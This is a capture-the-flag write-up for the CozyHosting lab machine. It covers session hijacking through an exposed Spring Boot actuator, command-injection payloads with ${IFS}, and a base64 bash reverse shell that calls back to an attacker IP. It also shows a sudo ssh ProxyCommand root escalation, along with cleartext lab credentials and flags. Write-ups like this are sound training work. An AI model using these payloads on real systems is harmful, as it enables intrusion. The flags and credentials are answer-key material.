CozyHosting

IP: 10.10.11.230 Starting with the Nmap scan

nmap -sC -sV -o nmap 10.10.11.230

# Nmap 7.94 scan initiated Wed Sep 13 13:01:41 2023 as: nmap -sC -sV -o nmap 10.10.11.230
Nmap scan report for 10.10.11.230
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_  256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 13 13:01:57 2023 -- 1 IP address (1 host up) scanned in 16.54 seconds

we here have 2 ports open. Let's see what do we have on the port 80

as we can see we can't see the webpage let's add it to the /etc/hosts/ file

sudo nano /etc/hosts

Now if we reload the page we can see that we have a website running on port 80

Let's do a quick directory brute-forcing.

gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://cozyhosting.htb -k -x php,txt,js

so we have found some directories let's start with the login page

So it's a simple login page. Moving to the error page

So, Here we have got an interesting error which says Whilelabel Error Page. Doing some googlefu we find an interesting thing

So this means that we have springboot here. Now let's bruteforce the directory with the spring-boot wordlist.

ffuf -u http://cozyhosting.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/spring-boot.txt

We have found this actuator directory. Let's go through this one by one.

So, in /actutor/sessions we located something like a username with a random string. Maybe we can try them as cookies and get access to this account. And if it doesn’t work, then we can also try to brute-force with this ‘username’.

After entering the string in the JSESSIONID and refreshing the page we can see that we are logged in as K.anderson which is also an admin account as we have access to the admin dashboard as well.

So, nothing is interesting here except this one thing.

let's capture the request in burpsuite.

we can see that the POST req is being executed on /executessh. After giving a random hostname & username, we captured the request in BurpSuite. Then we tried to send the request (using Burp Repeater) without giving the username & it responded as an ssh command help section.

This shows that it’s ssh command usage, let us try a few more things. Let's try a simple ping command back to the attacker's machine. Looks like the attacker can ping the attacker machine from the target using command injection by entering the following in the username field

;ping${IFS}-c4${IFS}10.10.14.137;#

The ${IFS} is the equivalent to a white space character.

Let's try making our payload which will give a reverseshell while executed by the machine or You can use any of the reverse-ssh payload available on the Internet.

echo "bash -i >& /dev/tcp/10.10.14.137/6658 0>&1" | base64 -w 0

Use the created payload in the reverse shell payload and pass it to the parameter. What it does, it decodes the base64 shell code and passes it to the bash in the server. ($IFS%?? is the equal to white space character).

;echo${IFS%??}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMzcvNjY1OCAwPiYxCg=="${IFS%??}|${IFS%??}base64${IFS%??}-d${IFS%??}|${IFS%??}bash;

We’ll send this payload as the username with the URL encoded & start a listener on our machine. After encoding it into the url and sending a request. we can see that we got a shell

nc -nlvp 6658

so we have a jar file. The Spring Boot web application is contained within the /app/cloudhosting-0.0.1.jar file.

Let's fetch the file to our device, to extract and see what’s inside. Fetching files, will be done using creating a server using Python and then downloading using wget into our system.

python3 -m http.server 1111

wget http://10.10.11.230:1111/cloudhosting-0.0.1.jar

Let's open this with jd-gui.

jd-gui cloudhosting-0.0.1.jar

We got the PostgreSQL database’s username & password. postgres: Vg&nvzAQ7XxR Now let's login through Postgre SQL with this creds

psql -h 127.0.0.1 -U postgres

So, after getting connected, we listed the databases available and found cozyhosting.

\c is used to connect to specific database in our case, its Cozyhosting\d is used to see all the tables in the database

\d is used to see all the tables in the database.

so here we have the admin hash let's crack it

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

We got the username while searching in the shell josh:manchesterunited As we saw in the nmap scan we have SSH open so let's connect through that.

ssh josh@10.10.11.230

let's grab our user.txt

Flag: 001e788a9504cc6e79d0b70cabecceba

Now let's go for the root flag

sudo -l

Lmao! Let's go to GTFobins

let's use the proxy command option payload

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

Let's grab the root flag.

Flag: af9a86cc816d3b359ff652e0a67602c4